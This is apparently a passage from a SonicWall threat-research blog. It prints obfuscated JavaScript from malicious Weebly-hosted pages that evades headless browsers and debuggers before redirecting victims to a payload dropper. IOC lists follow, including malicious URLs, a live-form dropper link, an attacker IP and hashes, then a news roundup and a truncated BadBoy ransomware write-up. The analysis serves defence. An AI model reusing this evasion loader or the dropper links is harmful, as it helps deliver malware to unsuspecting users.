‘\x4c\x54\x7a\x45\x4b’: function(_0x157ceb, _0x308ee5) {
return _0x157ceb == _0x308ee5;
},
‘\x6a\x77\x4d\x4f\x66’: function(_0x58247b, _0x36d56) {
return _0x58247b !== _0x36d56;
},
‘\x77\x6e\x51\x57\x6e’: _0x2b74(‘\x30\x78\x33\x34’, ‘\x71\x36\x59\x5b’),
‘\x70\x41\x4c\x4c\x61’: function(_0x5c2048, _0x30c7d1) {
return _0x5c2048 != _0x30c7d1;
},
‘\x7a\x6f\x65\x69\x48’: _0x2b74(‘\x30\x78\x36\x62’, ‘\x57\x2a\x58\x26’),
‘\x72\x7a\x69\x6f\x4e’: function(_0x22e57a, _0x290864) {
return _0x22e57a === _0x290864;
},
‘\x73\x55\x4a\x43\x52’: function(_0x1df977, _0x5584bb) {
return _0x1df977 + _0x5584bb;
},
‘\x63\x46\x74\x65\x67’: _0x2b74(‘\x30\x78\x34\x37’, ‘\x35\x29\x74\x52’),
‘\x61\x45\x67\x54\x50’: _0x2b74(‘\x30\x78\x39\x30’, ‘\x37\x77\x69\x66’),
‘\x56\x61\x7a\x58\x4c’: ‘\x77\x69\x6e\x64\x6f\x77\x2e\x68\x69\x73\x74\x6f\x72\x79\x2e\x66\x6f\x72\x77\x61\x72\x64\x28\x29\x3b’
};
num = _0x292066[_0x2b74(‘\x30\x78\x33\x39’, ‘\x67\x6b\x63\x4e’)](_0x355530, 0x1, _0x292066[_0x2b74(‘\x30\x78\x33\x32’, ‘\x32\x43\x65\x4e’)](_0x292066[_0x2b74(‘\x30\x78\x37\x34’, ‘\x55\x41\x35\x25’)](0x2, 0x4), 0x6) * 0x9);
if (_0x292066[_0x2b74(‘\x30\x78\x36\x63’, ‘\x24\x29\x53\x73’)](num, 0x1)) {
if (_0x2b74(‘\x30\x78\x38\x31’, ‘\x33\x6b\x68\x46’) === _0x292066[‘\x6c\x56\x68\x4f\x66’]) {
_0x19dc3b = !![];
} else {
var _0x56a05e = fn[_0x2b74(‘\x30\x78\x35\x64’, ‘\x51\x5d\x75\x40’)](context, arguments);
fn = null;
return _0x56a05e;
}
} else {
if (_0x292066[‘\x4e\x44\x64\x45\x73’](_0x2b74(‘\x30\x78\x31\x66’, ‘\x4a\x71\x4c\x64’), _0x292066[_0x2b74(‘\x30\x78\x63\x32’, ‘\x38\x38\x32\x4f’)])) {
window[_0x2b74(‘\x30\x78\x63\x66’, ‘\x32\x74\x67\x73’)][_0x2b74(‘\x30\x78\x64\x33’, ‘\x48\x59\x58\x62’)]();
} else {
_0x19dc3b = ![];
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x35\x62’, ‘\x58\x73\x52\x4c’)](_0x19dc3b, !![])) {
if (_0x292066[_0x2b74(‘\x30\x78\x39\x31’, ‘\x55\x41\x35\x25’)](_0x2b74(‘\x30\x78\x62\x65’, ‘\x6e\x75\x61\x7a’), _0x292066[_0x2b74(‘\x30\x78\x31\x34’, ‘\x41\x68\x6c\x62’)])) {
if (_0x292066[_0x2b74(‘\x30\x78\x33\x38’, ‘\x2a\x21\x25\x5d’)](_0x292066[‘\x58\x6a\x47\x4d\x5a’](”, _0x292066[_0x2b74(‘\x30\x78\x35\x33’, ‘\x63\x67\x6e\x25’)](counter, counter))[_0x292066[_0x2b74(‘\x30\x78\x31\x61’, ‘\x52\x74\x36\x77’)]], 0x1) || _0x292066[‘\x4e\x44\x64\x45\x73’](_0x292066[_0x2b74(‘\x30\x78\x62\x61’, ‘\x63\x67\x6e\x25’)](counter, 0x14), 0x0)) {
debugger ;
} else {
debugger ;
}
} else {
stoper = 0x1;
}
}
if (/HeadlessChrome/[_0x2b74(‘\x30\x78\x37\x39’, ‘\x5e\x72\x43\x28’)](window[_0x2b74(‘\x30\x78\x62\x36’, ‘\x67\x38\x67\x67’)][‘\x75\x73\x65\x72\x41\x67\x65\x6e\x74’])) {
if (_0x292066[‘\x58\x51\x73\x55\x51’](_0x292066[‘\x61\x43\x57\x4a\x44’], _0x292066[_0x2b74(‘\x30\x78\x37\x33’, ‘\x6e\x33\x71\x72’)])) {
if (!Function[_0x2b74(‘\x30\x78\x61\x39’, ‘\x75\x68\x29\x44’)][_0x2b74(‘\x30\x78\x34\x61’, ‘\x4a\x71\x4c\x64’)]) {
botFound = 0x1;
return;
}
if (_0x292066[‘\x75\x4c\x75\x59\x66’](Function[_0x2b74(‘\x30\x78\x34\x38’, ‘\x24\x29\x53\x73’)][_0x2b74(‘\x30\x78\x61\x36’, ‘\x21\x63\x46\x41’)][_0x2b74(‘\x30\x78\x34\x33’, ‘\x21\x63\x46\x41’)]()[_0x2b74(‘\x30\x78\x39\x39’, ‘\x44\x4f\x64\x47’)](/bind/g, _0x292066[‘\x79\x6f\x6d\x48\x48’]), Error[_0x2b74(‘\x30\x78\x62\x38’, ‘\x51\x5d\x75\x40’)]())) {
botFound = 0x1;
return;
}
if (Function[_0x2b74(‘\x30\x78\x30’, ‘\x44\x54\x49\x4a’)][_0x2b74(‘\x30\x78\x37\x36’, ‘\x57\x2a\x58\x26’)][_0x2b74(‘\x30\x78\x61\x33’, ‘\x74\x51\x5b\x55’)]()[_0x2b74(‘\x30\x78\x35\x30’, ‘\x45\x58\x37\x54’)](/toString/g, _0x292066[_0x2b74(‘\x30\x78\x64\x38’, ‘\x75\x68\x29\x44’)]) != Error[_0x2b74(‘\x30\x78\x37\x35’, ‘\x5e\x72\x43\x28’)]()) {
botFound = 0x1;
return;
}
} else {
botFound = 0x1;
}
}
if (navigator[_0x2b74(‘\x30\x78\x34\x36’, ‘\x37\x77\x69\x66’)]) {
if (_0x292066[_0x2b74(‘\x30\x78\x35\x63’, ‘\x28\x57\x4c\x32’)](_0x2b74(‘\x30\x78\x31\x37’, ‘\x4e\x6a\x24\x6d’), _0x2b74(‘\x30\x78\x32’, ‘\x48\x59\x58\x62’))) {
_0x292066[‘\x61\x6d\x64\x71\x41’](_0x102c43, this, function() {
var _0x3bfdd2 = new RegExp(‘\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x2a\x5c\x28\x20\x2a\x5c\x29’);
var _0xda1de4 = new RegExp(_0x292066[_0x2b74(‘\x30\x78\x31’, ‘\x5a\x4e\x78\x6f’)],’\x69′);
var _0x3aa548 = _0x292066[_0x2b74(‘\x30\x78\x31\x35’, ‘\x54\x51\x24\x79’)](_0x5c5f61, _0x292066[_0x2b74(‘\x30\x78\x32\x35’, ‘\x57\x2a\x58\x26’)]);
if (!_0x3bfdd2[_0x2b74(‘\x30\x78\x63\x37’, ‘\x45\x58\x37\x54’)](_0x292066[_0x2b74(‘\x30\x78\x34\x39’, ‘\x45\x35\x56\x7a’)](_0x3aa548, _0x292066[_0x2b74(‘\x30\x78\x36\x33’, ‘\x38\x38\x32\x4f’)])) || !_0xda1de4[_0x2b74(‘\x30\x78\x39\x37’, ‘\x5a\x4e\x78\x6f’)](_0x292066[‘\x52\x4e\x48\x47\x4e’](_0x3aa548, _0x292066[_0x2b74(‘\x30\x78\x33\x65’, ‘\x44\x4f\x64\x47’)]))) {
_0x292066[_0x2b74(‘\x30\x78\x32\x36’, ‘\x30\x36\x32\x26’)](_0x3aa548, ‘\x30’);
} else {
_0x292066[‘\x4d\x55\x76\x74\x4b’](_0x5c5f61);
}
})();
} else {
botFound = 0x1;
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x38\x63’, ‘\x42\x46\x4f\x38’)](navigator[_0x2b74(‘\x30\x78\x61\x32’, ‘\x38\x38\x32\x4f’)], ”)) {
botFound = 0x1;
}
if (window[‘\x63\x61\x6c\x6c\x50\x68\x61\x6e\x74\x6f\x6d’] || window[_0x2b74(‘\x30\x78\x32\x61’, ‘\x5e\x72\x43\x28’)]) {
if (_0x292066[‘\x4e\x4f\x63\x59\x61’](_0x292066[_0x2b74(‘\x30\x78\x65’, ‘\x76\x45\x5b\x54’)], _0x2b74(‘\x30\x78\x36\x61’, ‘\x74\x51\x5b\x55’))) {
var _0x73dfb1 = function() {
var _0x554545 = _0x73dfb1[_0x2b74(‘\x30\x78\x64’, ‘\x64\x44\x6a\x4f’)](_0x292066[_0x2b74(‘\x30\x78\x38\x35’, ‘\x4e\x6a\x24\x6d’)])()[_0x2b74(‘\x30\x78\x32\x34’, ‘\x32\x74\x67\x73’)](_0x292066[_0x2b74(‘\x30\x78\x34\x63’, ‘\x21\x31\x54\x42’)]);
return !_0x554545[_0x2b74(‘\x30\x78\x38\x62’, ‘\x4a\x71\x4c\x64’)](_0x3b6a81);
};
return _0x292066[_0x2b74(‘\x30\x78\x32\x31’, ‘\x28\x39\x4a\x54’)](_0x73dfb1);
} else {
botFound = 0x1;
}
}
(function() {
if (!Function[_0x2b74(‘\x30\x78\x32\x63’, ‘\x6e\x33\x71\x72’)][_0x2b74(‘\x30\x78\x38\x33’, ‘\x54\x51\x24\x79’)]) {
botFound = 0x1;
return;
}
if (_0x292066[‘\x75\x4c\x75\x59\x66’](Function[_0x2b74(‘\x30\x78\x38’, ‘\x6e\x75\x61\x7a’)][_0x2b74(‘\x30\x78\x35\x36’, ‘\x74\x51\x5b\x55’)][_0x2b74(‘\x30\x78\x36\x39’, ‘\x6e\x33\x71\x72’)]()[_0x2b74(‘\x30\x78\x36\x66’, ‘\x76\x45\x5b\x54’)](/bind/g, _0x292066[_0x2b74(‘\x30\x78\x64\x30’, ‘\x64\x44\x6a\x4f’)]), Error[_0x2b74(‘\x30\x78\x32\x62’, ‘\x33\x6b\x68\x46’)]())) {
botFound = 0x1;
return;
}
if (_0x292066[_0x2b74(‘\x30\x78\x36\x36’, ‘\x35\x29\x74\x52’)](Function[_0x2b74(‘\x30\x78\x36\x30’, ‘\x38\x38\x32\x4f’)][‘\x74\x6f\x53\x74\x72\x69\x6e\x67’][_0x2b74(‘\x30\x78\x61\x33’, ‘\x74\x51\x5b\x55’)]()[_0x2b74(‘\x30\x78\x36\x34’, ‘\x57\x2a\x58\x26’)](/toString/g, _0x292066[‘\x79\x6f\x6d\x48\x48’]), Error[_0x2b74(‘\x30\x78\x64\x31’, ‘\x32\x74\x67\x73’)]())) {
botFound = 0x1;
return;
}
}());
if (window[_0x2b74(‘\x30\x78\x63’, ‘\x21\x63\x46\x41’)][_0x2b74(‘\x30\x78\x38\x37’, ‘\x28\x57\x4c\x32’)][‘\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65’](_0x2b74(‘\x30\x78\x33\x66’, ‘\x62\x76\x54\x46’))) {
if (_0x292066[_0x2b74(‘\x30\x78\x31\x63’, ‘\x37\x77\x69\x66’)] === _0x2b74(‘\x30\x78\x66’, ‘\x32\x74\x67\x73’)) {
botFound = 0x1;
} else {
var _0x57a6c7 = function() {
while (!![]) {}
};
return _0x292066[_0x2b74(‘\x30\x78\x36\x32’, ‘\x54\x58\x57\x4d’)](_0x57a6c7);
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x61\x66’, ‘\x44\x54\x49\x4a’)](navigator[_0x2b74(‘\x30\x78\x35\x66’, ‘\x65\x29\x33\x51’)], !![])) {
if (_0x292066[_0x2b74(‘\x30\x78\x62\x30’, ‘\x28\x39\x4a\x54’)](_0x292066[_0x2b74(‘\x30\x78\x37\x37’, ‘\x75\x68\x29\x44’)], _0x292066[_0x2b74(‘\x30\x78\x34\x62’, ‘\x31\x4b\x37\x6f’)])) {
var _0x3a2240 = firstCall ? function() {
if (fn) {
var _0x398ec5 = fn[_0x2b74(‘\x30\x78\x63\x64’, ‘\x44\x4f\x64\x47’)](context, arguments);
fn = null;
return _0x398ec5;
}
}
: function() {}
;
firstCall = ![];
return _0x3a2240;
} else {
botFound = 0x1;
}
}
if (window[_0x2b74(‘\x30\x78\x34\x64’, ‘\x6e\x33\x71\x72’)] || window[_0x2b74(‘\x30\x78\x36\x38’, ‘\x54\x51\x24\x79’)]) {
if (‘\x51\x69\x52\x56\x4c’ === _0x2b74(‘\x30\x78\x63\x39’, ‘\x71\x36\x59\x5b’)) {
botFound = 0x1;
} else {
var _0x354d13 = new RegExp(_0x292066[‘\x67\x4f\x42\x4f\x51’]);
var _0x3892a4 = new RegExp(_0x292066[‘\x66\x55\x65\x66\x6d’],’\x69′);
var _0x40dc95 = _0x5c5f61(_0x292066[_0x2b74(‘\x30\x78\x37’, ‘\x24\x29\x53\x73’)]);
if (!_0x354d13[_0x2b74(‘\x30\x78\x37\x39’, ‘\x5e\x72\x43\x28’)](_0x292066[_0x2b74(‘\x30\x78\x38\x61’, ‘\x45\x58\x37\x54’)](_0x40dc95, _0x292066[_0x2b74(‘\x30\x78\x37\x62’, ‘\x32\x43\x65\x4e’)])) || !_0x3892a4[_0x2b74(‘\x30\x78\x61\x65’, ‘\x21\x31\x54\x42’)](_0x40dc95 + _0x292066[‘\x4f\x48\x6b\x5a\x54’])) {
_0x292066[_0x2b74(‘\x30\x78\x32\x39’, ‘\x75\x68\x29\x44’)](_0x40dc95, ‘\x30’);
} else {
_0x292066[‘\x51\x6e\x4b\x45\x51’](_0x5c5f61);
}
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x63\x35’, ‘\x45\x35\x56\x7a’)](window[_0x2b74(‘\x30\x78\x61\x37’, ‘\x32\x43\x65\x4e’)], 0x1) && _0x292066[‘\x4e\x4f\x63\x59\x61’](window[‘\x62\x6f\x74\x46\x6f\x75\x6e\x64’], 0x0)) {
if (_0x292066[_0x2b74(‘\x30\x78\x32\x37’, ‘\x67\x38\x67\x67’)](_0x292066[‘\x7a\x6f\x65\x69\x48’], _0x292066[_0x2b74(‘\x30\x78\x61’, ‘\x4e\x6a\x24\x6d’)])) {
var _0x2e75d6 = window[_0x2b74(‘\x30\x78\x31\x30’, ‘\x43\x73\x40\x25’)][_0x2b74(‘\x30\x78\x63\x63’, ‘\x74\x51\x5b\x55’)][‘\x73\x6c\x69\x63\x65’](0x1);
if (_0x292066[_0x2b74(‘\x30\x78\x34\x35’, ‘\x76\x45\x5b\x54’)](_0x2e75d6, ”)) {
_0x2e75d6 = window[_0x2b74(‘\x30\x78\x35\x39’, ‘\x76\x45\x5b\x54’)][_0x2b74(‘\x30\x78\x36’, ‘\x55\x41\x35\x25’)][_0x2b74(‘\x30\x78\x39\x34’, ‘\x52\x74\x36\x77’)](_0x292066[_0x2b74(‘\x30\x78\x64\x36’, ‘\x2a\x21\x25\x5d’)](window[_0x2b74(‘\x30\x78\x62\x35’, ‘\x6e\x33\x71\x72’)][_0x2b74(‘\x30\x78\x33\x61’, ‘\x44\x4f\x64\x47’)][_0x2b74(‘\x30\x78\x39\x66’, ‘\x5e\x72\x43\x28’)](‘\x23’), 0x1));
}
var _0x58061a = _0x292066[‘\x63\x46\x74\x65\x67’];
document[_0x2b74(‘\x30\x78\x38\x34’, ‘\x49\x26\x38\x4b’)][_0x2b74(‘\x30\x78\x34\x30’, ‘\x5a\x4e\x78\x6f’)] = _0x292066[_0x2b74(‘\x30\x78\x39\x35’, ‘\x21\x31\x54\x42’)](_0x58061a, _0x292066[_0x2b74(‘\x30\x78\x34\x34’, ‘\x51\x5d\x75\x40’)]) + _0x2e75d6;
_0x292066[_0x2b74(‘\x30\x78\x39\x61’, ‘\x49\x26\x38\x4b’)](setTimeout, _0x292066[_0x2b74(‘\x30\x78\x64\x32’, ‘\x76\x4c\x37\x59’)], 0x0);
window[_0x2b74(‘\x30\x78\x36\x37’, ‘\x45\x35\x56\x7a’)] = function() {
var _0x13d432 = {
‘\x57\x6e\x6a\x61\x73’: function(_0x4f5ed5) {
return _0x292066[_0x2b74(‘\x30\x78\x61\x62’, ‘\x36\x50\x5a\x47’)](_0x4f5ed5);
}
};
if (_0x292066[‘\x45\x43\x56\x43\x78’] !== _0x2b74(‘\x30\x78\x35\x34’, ‘\x64\x44\x6a\x4f’)) {
null;
} else {
_0x13d432[_0x2b74(‘\x30\x78\x31\x62’, ‘\x2a\x21\x25\x5d’)](_0x5c5f61);
}
}
;
} else {
botFound = 0x1;
}
}
}
function _0x47b803() {}
function _0x5c5f61(_0x3d4ef9) {
var _0x958405 = {
‘\x4c\x58\x45\x56\x79’: _0x2b74(‘\x30\x78\x35\x35’, ‘\x32\x43\x65\x4e’),
‘\x76\x77\x53\x4c\x69’: function(_0x1b126c, _0x2283f8) {
return _0x1b126c * _0x2283f8;
},
‘\x44\x4c\x49\x73\x49’: function(_0xa896f2, _0x3dcba0) {
return _0xa896f2 > _0x3dcba0;
},
‘\x64\x79\x46\x4f\x6e’: function(_0x550534, _0x4c8cc3, _0x29892e) {
return _0x550534(_0x4c8cc3, _0x29892e);
},
‘\x66\x43\x72\x6f\x44’: function(_0x169c35, _0x10cca4) {
return _0x169c35 – _0x10cca4;
},
‘\x57\x58\x70\x49\x63’: _0x2b74(‘\x30\x78\x33\x37’, ‘\x52\x74\x36\x77’),
‘\x45\x4f\x4a\x75\x77’: function(_0x53c43a, _0x130863) {
return _0x53c43a === _0x130863;
},
‘\x43\x74\x49\x7a\x4a’: ‘\x44\x4b\x57\x67\x51’,
‘\x58\x75\x54\x41\x51’: function(_0x37f3f3) {
return _0x37f3f3();
},
‘\x70\x79\x77\x47\x46’: function(_0x7a6ea6, _0xfb52a9) {
return _0x7a6ea6 === _0xfb52a9;
},
‘\x76\x72\x75\x45\x71’: _0x2b74(‘\x30\x78\x37\x66’, ‘\x5e\x50\x4b\x49’),
‘\x73\x51\x53\x73\x41’: _0x2b74(‘\x30\x78\x33\x33’, ‘\x30\x36\x32\x26’),
‘\x61\x4e\x4c\x55\x4b’: function(_0x5d6cd1, _0x193cae) {
return _0x5d6cd1 !== _0x193cae;
},
‘\x79\x67\x78\x45\x4e’: function(_0x156d2b, _0xc9c318) {
return _0x156d2b / _0xc9c318;
},
‘\x42\x59\x77\x55\x6a’: _0x2b74(‘\x30\x78\x61\x31’, ‘\x2a\x21\x25\x5d’),
‘\x4e\x78\x4c\x4f\x46’: _0x2b74(‘\x30\x78\x38\x38’, ‘\x2a\x21\x25\x5d’),
‘\x4a\x6b\x79\x77\x78’: function(_0x164679, _0x559fd2) {
return _0x164679(_0x559fd2);
},
‘\x55\x76\x53\x45\x43’: _0x2b74(‘\x30\x78\x38\x30’, ‘\x6e\x33\x71\x72’),
‘\x76\x56\x41\x77\x41’: function(_0x1d5f32, _0x1d6c90) {
return _0x1d5f32(_0x1d6c90);
}
};
function _0x483faa(_0x1eabd1) {
var _0x4404d8 = {
‘\x54\x6d\x78\x41\x76’: function(_0x16ba48, _0x21289c) {
return _0x16ba48(_0x21289c);
}
};
if (typeof _0x1eabd1 === _0x958405[‘\x57\x58\x70\x49\x63’]) {
if (_0x958405[_0x2b74(‘\x30\x78\x32\x64’, ‘\x4e\x6a\x24\x6d’)](_0x958405[‘\x43\x74\x49\x7a\x4a’], _0x2b74(‘\x30\x78\x32\x66’, ‘\x33\x6b\x68\x46’))) {
_0x4404d8[_0x2b74(‘\x30\x78\x61\x63’, ‘\x48\x59\x58\x62’)](result, ‘\x30’);
} else {
var _0x2d4448 = function() {
if (_0x958405[_0x2b74(‘\x30\x78\x62\x39’, ‘\x21\x63\x46\x41’)] !== _0x958405[‘\x4c\x58\x45\x56\x79’]) {
botFound = 0x1;
} else {
while (!![]) {}
}
};
return _0x958405[‘\x58\x75\x54\x41\x51’](_0x2d4448);
}
} else {
if (_0x958405[_0x2b74(‘\x30\x78\x35’, ‘\x54\x51\x24\x79’)](_0x958405[_0x2b74(‘\x30\x78\x61\x30’, ‘\x36\x50\x5a\x47’)], _0x958405[_0x2b74(‘\x30\x78\x34\x65’, ‘\x64\x44\x6a\x4f’)])) {
for (a = 0x1; a <= iterations; a++) {
num = _0x958405[_0x2b74(‘\x30\x78\x36\x64’, ‘\x30\x36\x32\x26’)](Math[_0x2b74(‘\x30\x78\x38\x66’, ‘\x63\x67\x6e\x25’)](), 0x2710);
}
if (_0x958405[_0x2b74(‘\x30\x78\x36\x35’, ‘\x71\x36\x59\x5b’)](depth, 0x0)) {
return _0x958405[‘\x64\x79\x46\x4f\x6e’](_0x355530, Math[_0x2b74(‘\x30\x78\x33\x62’, ‘\x28\x39\x4a\x54’)](num, 0x1), _0x958405[_0x2b74(‘\x30\x78\x61\x61’, ‘\x49\x26\x38\x4b’)](depth, 0x1));
} else {
return num;
}
} else {
if (_0x958405[‘\x61\x4e\x4c\x55\x4b’]((” + _0x958405[‘\x79\x67\x78\x45\x4e’](_0x1eabd1, _0x1eabd1))[_0x958405[_0x2b74(‘\x30\x78\x64\x35’, ‘\x42\x46\x4f\x38’)]], 0x1) || _0x958405[_0x2b74(‘\x30\x78\x34\x32’, ‘\x31\x4b\x37\x6f’)](_0x1eabd1 % 0x14, 0x0)) {
if (_0x958405[_0x2b74(‘\x30\x78\x39\x63’, ‘\x65\x29\x33\x51’)](_0x958405[_0x2b74(‘\x30\x78\x63\x36’, ‘\x52\x74\x36\x77’)], _0x958405[_0x2b74(‘\x30\x78\x34\x66’, ‘\x76\x45\x5b\x54’)])) {
return num;
} else {
debugger ;
}
} else {
debugger ;
}
}
}
_0x958405[‘\x4a\x6b\x79\x77\x78’](_0x483faa, ++_0x1eabd1);
}
try {
if (_0x3d4ef9) {
if (_0x958405[‘\x55\x76\x53\x45\x43’] === _0x958405[_0x2b74(‘\x30\x78\x37\x63’, ‘\x51\x5d\x75\x40’)]) {
return _0x483faa;
} else {
botFound = 0x1;
}
} else {
_0x958405[‘\x76\x56\x41\x77\x41’](_0x483faa, 0x0);
}
} catch (_0x1611d5) {}
}
}
</script>
</head>
<body></body>
</html>

 

Because of the advanced javascript techniques, these malicious URLs are not detected by any security vendors. They all follow the same pattern in the URL */uploads/1/3/* and all these malicious websites are found to be hosted on Weebly (a website and eCommerce service). Attackers possibly compromised the web sites hosted on Weebly and dropped the malicious html and pdf documents into the uploads directory.

 

 

When not debugged and no bot found, it redirects the user to the below page which delivers the payload “new toeic reading test.exe” to the victim. Based on the input passed in the URL, different payloads get delivered.

 

 

At the bottom of the pdf, more such malicious pdf links are provided. We observe various pdf’s in this format hosted on the compromised web pages. The first malicious file in this campaign was observed on 2020-01-05 (hash: E684AEEAA0F12D415C0EF321341BCF2FF0CBE7B3099EFC8A2E99B49794F337D9) and over 20,000 unique malicious pdfs in this format have been collected in VirusTotal in the last 6 months.

 

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: 6075 RobotInstall.PD

GAV: 5313 Malagent.N_69

IOC’s:

PDF

hxxp://abeautypageants.com/uploads/1/3/0/4/130477064/tawesa_metumiwi.pdf
hxxp://andrewgouldmusic.com/uploads/1/3/0/5/130551623/dijumuzu.pdf
hxxp://gooebuttercakes.com/uploads/1/3/0/5/130550825/desosi-fuzivekok.pdf
hxxp://skyhutchison89.com/uploads/1/3/0/4/130483981/wasakufoturulumowob.pdf
hxxp://mepalparish.org/uploads/1/3/0/5/130551962/308871.pdf
hxxp://springbloomhealth.net/uploads/1/3/0/5/130588533/puzevubezaxudip-zikitaza-jiraxiri-sixotijisa.pdf
hxxp://turnerhallmedia.com/uploads/1/3/0/7/130738507/putolumeka.pdf
hxxp://cannabisusa.world/uploads/1/3/0/3/130313090/dulivizexifekoxoseva.pdf
hxxp://bydaff.com/uploads/1/3/0/9/130969768/1870408.pdfhxxp://pwinthtwe.com/uploads/1/3/0/3/130379841/tavulesad.pdf
hxxp://magicaladventurestravelbystacy.com/uploads/1/3/0/7/130776561/nikovadato-matoxop-woposowogewitu-vetazujugigisu.pdf)
hxxp://mta-sts.lavwcd.com/uploads/1/3/0/6/130640097/xamidezetufef.pdf
hxxp://cristinmcintyre.com/uploads/1/3/0/3/130323635/mowena.pdfhxxp://beringsearestaurant.com/uploads/1/3/0/2/130272347/5798288.pdf
hxxp://ag-one.com/uploads/1/3/1/4/131437737/gedanisinena.pdfhxxp://borgproduction.fr/uploads/1/3/0/3/130379634/7c6c5.pdf

html/javascript:

hxxp://mercyministrystl.org/uploads/1/3/0/6/130621669/130621669.html
hhxxp://beeidentification.com/uploads/1/3/0/6/130605420/130605420.htmlnew+toeic+reading+test
hxxp://homefromhomebandbwinchester.com/uploads/1/3/0/6/130620251/130620251.htmlpoldark+season+5+episode+3+recap
hxxp://galibellesue.com/uploads/1/3/0/6/130604986/130604986.htmltexto+informativo+sobre+los+animales+en+peligro+de+extinci%C3%B3n
hxxp://southbayreiki.com/uploads/1/3/0/6/130639956/130639956.htmlcartea+mortilor+film+online+subtitra
hxxp://2averagedudes.com/uploads/1/3/0/6/130604402/130604402.htmlrussian+keyboard+download+windows+10)

Payload dropper:

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=teamviewer+free++version+9.+0&s1=1m2dj0iak20d
Teamviewerviewer : dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=new+toeic+reading+test&s1=191vbjoak560dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Payload:

dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Attacker IP:

104.27.181.152 – hxxp://ttraff.cc

Hosting server IP (Weebly):

199.34.228.54
199.34.228.59
199.34.228.100
199.34.228.71

 

Cybersecurity News & Trends – 07-02-20

This week, the U.S. government brought up cybersecurity legislation, while the U.S. judicial system handed down cybercriminal incarceration.


SonicWall Spotlight

Hackers used ransomware to take over parts of UC San Francisco’s network and extorted $1.14million in exchange for returning access to their files — Daily Mail

  • UC San Francisco hasn’t said what files were affected nor how the ransomware entered the system, but the FBI has opened an investigation into the incident.

Sonicwall Lands In Ireland, Expands Channel Partner Strategy — SonicWall Press Release

  • SonicWall today announced that it has appointed Tristan Bateup as country manager for Ireland.

UCSF pays $1 million ransom to recover medical school data from hackers — The Mercury News

  • The UCSF School of Medicine was the third targeted by cyberattacks in the past two months, but a spokesperson said the attack did not affect patient care or ongoing COVID-19 research.

Cybersecurity News

Russian Criminal Group Finds New Target: Americans Working at Home — The New York Times

  • A hacking group calling itself Evil Corp., indicted in December, has shown up in corporate networks with sophisticated ransomware. American officials worry election infrastructure could be next.

How COVID-19 changed Cyber Command’s ‘Cyber Flag’ exercise — Cyberscoop

  • This year, U.S. Cyber Command convened with allied countries for what appeared to be a straightforward simulation of an attack against a European airbase — but then a global pandemic changed all the rules.

Russian cybercriminal gets 9 years for online fraud website — The Washington Times

  • A Russian computer hacker who facilitated $20 million in credit card fraud and ran a sophisticated clearinghouse for international cybercriminals was sentenced Friday to nine years in prison.

Lawmakers introduce legislation to establish national cybersecurity director — The Hill

  • A bipartisan group of lawmakers has introduced legislation in the House that would establish a national cybersecurity director to lead government efforts on cybersecurity.

DDoS botnet coder gets 13 months in prison — ZDNet

  • Kenneth Schuchman, known as Nexus Zeta, created multiple DDoS botnets, including Satori, Okiru, Masuta, and Fbot/Tsunami.

An embattled group of leakers picks up the WikiLeaks mantle — Ars Technica

  • DDoSecrets was banned from Twitter after releasing what they claim is the largest-ever cache of hacked U.S. police data, a leak some say positions the group as the heir apparent of WikiLeaks’ early, idealistic mission.

Senators move to boost state and local cybersecurity as part of annual defense bill — The Hill

  • A group of Senate Democrats on Monday introduced as part of the annual National Defense Authorization Act (NDAA) a measure that would strengthen cybersecurity protections for states vulnerable to malicious cyberattacks.

U.S. FCC issues final orders declaring Huawei, ZTE national security threats — Reuters

  • The FCC has formally designated China’s Huawei Technologies Co and ZTE Corp as posing threats to national security, barring U.S. firms from tapping an $8.3 billion government fund to purchase equipment from the companies.

Schools Already Struggled With Cybersecurity. Then Came Covid-19 — Wired

  • A lack of dedicated funding and resources made it hard to keep data secure — and that was before classes moved almost entirely online.

Things that happen every four years: Olympic Games, presidential elections, and now new Mac ransomware — The Register

  • Known as EvilQuest, the brand-new strain of Mac ransomware was spotted spreading via Russian piracy and torrent sites.

DDoS Attacks Jump 542% from Q4 2019 to Q1 2020 — Dark Reading

  • The shift to remote work and heavy reliance on online services has driven an increase in attacks intended to overwhelm ISPs.

Tax software used by Chinese bank clients installs GoldenSpy backdoor — SC Magazine

  • A tax software program installed by business clients of an unidentified Chinese bank was trojanized with malware that installs a backdoor granting attackers system-level privileges, researchers warn.

In Case You Missed It

BadBoy ransomware, variant of Spartacus charges $1000 for decryption

The SonicWall Capture Labs threat research team have observed reports of ransomware that encrypts files and appends a “.BadBoy” extension to their names.  This variant of the malware is new but is based on Spartacus ransomware which was first seen in early 2018.  Like Spartacus, it is written in .NET and uses a ransom page that is similar in appearance.  However, in this variant, the code is not obfuscated.

 

Infection Cycle:

 

Upon execution, files are encrypted and the following message is displayed on the desktop:

 

Files encrypted by the malware are given a .BadBoy extension.

The malware drops ReadME-BadboyEncryption.txt on to the desktop.  It contains the following message:

 

As the malware is written in .NET, it is easy to decompile and analyse.  Initial inspection of the decompiled output paints a clear picture of the malware’s intentions:

BadBoy code layout

 

The code layout of the BadBoy variant is simple compared to Spartacus’ layout which is obfuscated:

Spartacus obfuscated code layout

 

Further inspection shows the directories and file extensions that are targeted for encryption:

 

Files of the following filetypes are sought out and encrypted:

